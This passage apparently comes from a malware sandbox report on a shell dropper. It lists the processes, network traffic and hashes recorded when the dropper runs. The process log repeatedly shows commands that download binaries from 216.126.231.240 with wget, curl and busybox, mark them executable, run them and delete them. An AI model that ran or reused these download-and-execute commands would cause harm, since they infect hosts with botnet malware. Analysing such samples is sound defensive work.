| File opened for modification | /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt | /usr/bin/curl | N/A |
| File opened for modification | /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS | /usr/bin/curl | N/A |
| File opened for modification | /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG | /usr/bin/curl | N/A |
| File opened for modification | /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I | /usr/bin/curl | N/A |
| File opened for modification | /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ | /usr/bin/curl | N/A |
Processes
/tmp/74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh
[/tmp/74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/bin/chmod
[chmod 777 YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I
[./YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/bin/rm
[rm YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/usr/bin/wget
[wget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/bin/chmod
[chmod 777 VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS
[./VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/bin/rm
[rm VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/usr/bin/wget
[wget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/bin/chmod
[chmod 777 fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd
[./fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/bin/rm
[rm fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/usr/bin/wget
[wget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/bin/chmod
[chmod 777 H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS
[./H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/bin/rm
[rm H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/usr/bin/wget
[wget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/bin/chmod
[chmod 777 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi
[./4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/bin/rm
[rm 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/usr/bin/wget
[wget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/bin/chmod
[chmod 777 RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed
[./RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/bin/rm
[rm RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/usr/bin/wget
[wget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/bin/chmod
[chmod 777 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE
[./1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/bin/rm
[rm 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/usr/bin/wget
[wget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/bin/chmod
[chmod 777 wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ
[./wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/bin/rm
[rm wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/usr/bin/wget
[wget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/bin/chmod
[chmod 777 H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak
[./H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/bin/rm
[rm H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/usr/bin/wget
[wget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/bin/chmod
[chmod 777 cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ
[./cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/bin/rm
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |